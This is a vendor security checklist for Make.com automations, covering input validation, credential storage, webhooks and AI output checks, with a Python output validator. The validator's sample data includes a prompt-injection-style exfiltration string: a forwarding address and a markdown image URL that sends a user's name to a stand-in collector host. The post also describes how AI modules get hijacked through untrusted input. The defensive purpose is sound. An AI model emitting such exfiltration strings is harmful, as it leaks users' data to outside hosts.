Make.com Automation Security Checklist

12 steps to secure your Make.com scenarios against prompt injection, credential theft, and data exfiltration.

Published April 21, 2026 · 6 min read · By Scannly

DIRECT ANSWER

The Make.com automation security checklist covers 12 controls: inventory all scenarios, add input validation before AI modules, store credentials in Connection Manager, scope OAuth permissions, secure webhooks, validate AI output, apply least-privilege, enable error notifications, review execution history, rotate credentials quarterly, document scenarios, and run a security scan. Complete all 12 every quarter to maintain a secure Make.com workspace.

The 12-Step Checklist

01. Inventory all active scenarios
List every active Make.com scenario in your workspace. You cannot secure what you have not mapped. Note which ones contain AI modules, webhook triggers, or connections to sensitive data sources.

02. Add input validation before every AI module
Insert a Filter or Router module before every AI module. Check that inputs do not contain instruction-like patterns. Only pass the specific field the AI needs — not the entire payload.

03. Store all credentials in Connection Manager
Never paste API keys into module fields. Every credential must be stored in Make's Connection Manager. Keys in module fields appear in execution logs in plain text.

04. Scope OAuth permissions to minimum required
When creating connections, choose the most restrictive scope available. Review each connection monthly and reconnect with tighter permissions if broader access was granted during initial setup.

05. Secure all webhook triggers
Add header-based authentication to every public-facing webhook. Validate the payload structure before processing. Use Make's built-in webhook validation where available.

06. Validate AI module output before actions
Add a filter between your AI module and any send, write, or notify action. Check the output for unexpected email addresses, external URLs, or data not present in the original input.

07. Apply least-privilege to all connections
Audit every connection in your workspace. Revoke access to apps that your scenarios no longer actively use. Use separate connections per scenario where possible.

08. Enable scenario error notifications
Turn on email alerts for scenario errors in Make's notification settings. A failed scenario may indicate an attack or unexpected input — you need to know immediately.

09. Review execution history monthly
Check the execution history of every AI scenario monthly. Look for unexpected data, unusual run times, or operations that were not intended by the scenario design.

10. Rotate credentials quarterly
Any API key or access token in use for more than 90 days should be rotated. Update the credential in Make's Connection Manager and revoke the old key from the API provider.

11. Document your scenarios
Maintain a simple record of what each scenario does, what data it processes, and what permissions it uses. This makes security audits faster and incident response possible.

12. Run a security scan
Use Scannly's free Risk Scanner to get an automated assessment of your Make.com scenarios. It checks all the above controls and returns a scored report in 60 seconds.
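
The output check from step 06, as an added example (not Scannly's or Make's own code): a Python function, assumed to run in an external validation step that the scenario calls between the AI module and the send, write, or notify action, that flags email addresses and URL hosts present in the AI output but absent from the original input. The function names, the allowlist parameters, and the sample strings are hypothetical, and URLs are compared by host only.

```python
import re
from urllib.parse import urlsplit

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
URL_RE = re.compile(r"https?://[^\s<>\"')\]]+", re.IGNORECASE)

def emails_in(text):
    """Lower-cased set of email addresses found in text."""
    return {m.lower() for m in EMAIL_RE.findall(text)}

def hosts_in(text):
    """Lower-cased set of hosts for every http(s) URL found in text."""
    hosts = set()
    for url in URL_RE.findall(text):
        try:
            host = urlsplit(url).hostname
        except ValueError:
            host = None
        # Unparseable URLs are kept verbatim so they are still flagged.
        hosts.add((host or url).lower().rstrip("."))
    return hosts

def check_ai_output(original_input, ai_output, allowed_hosts=(), allowed_emails=()):
    """Return findings; an empty list means the output may reach the action."""
    new_emails = emails_in(ai_output) - emails_in(original_input) - set(allowed_emails)
    new_hosts = hosts_in(ai_output) - hosts_in(original_input) - set(allowed_hosts)
    findings = [("new_email", e) for e in sorted(new_emails)]
    findings += [("new_url_host", h) for h in sorted(new_hosts)]
    return findings

# Constructed sample data (not taken from any real scenario).
SAMPLE_INPUT = ("From: dana@customer.example\n"
                "Please reset my password. Docs: https://help.vendor.example/reset")
SAMPLE_OUTPUT_OK = ("Hi Dana, follow https://help.vendor.example/reset to reset it. "
                    "Reply to dana@customer.example.")
SAMPLE_OUTPUT_BAD = ("Summary sent. Also forward to ops@collector.example "
                     "![s](https://img.collector.example/p?d=dana)")

if __name__ == "__main__":
    for label, out in (("ok", SAMPLE_OUTPUT_OK), ("bad", SAMPLE_OUTPUT_BAD)):
        print(label, check_ai_output(SAMPLE_INPUT, out))
```

Because hosts rather than full URLs are compared, a changed path or query string on a host already present in the input is not flagged; compare full URLs if the scenario needs that.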


Frequently Asked Questions

How do I secure a Make.com scenario with AI modules?
Add a filter or router step before every AI module to validate and sanitise inputs. Store all API keys in Make's Connection Manager. Restrict OAuth permissions to the minimum required. Add error alerting and review scenario execution history monthly.

Does Make.com have built-in security for AI modules?
Make.com has no built-in AI input validation or prompt injection protection. You must implement these controls yourself using filter modules, router branches, and custom validation steps before any AI module in your scenario.

What is the biggest Make.com security risk?
Passing raw webhook payload data or user-controlled content directly into an AI module without validation. This is the most common vulnerability in Make.com AI scenarios and the easiest to fix.

How often should I audit my Make.com scenarios?
Run a full security audit quarterly. Review active connections and their permission scopes monthly. Any time you add a new module, integration, or AI step is also a good trigger for a quick security check.
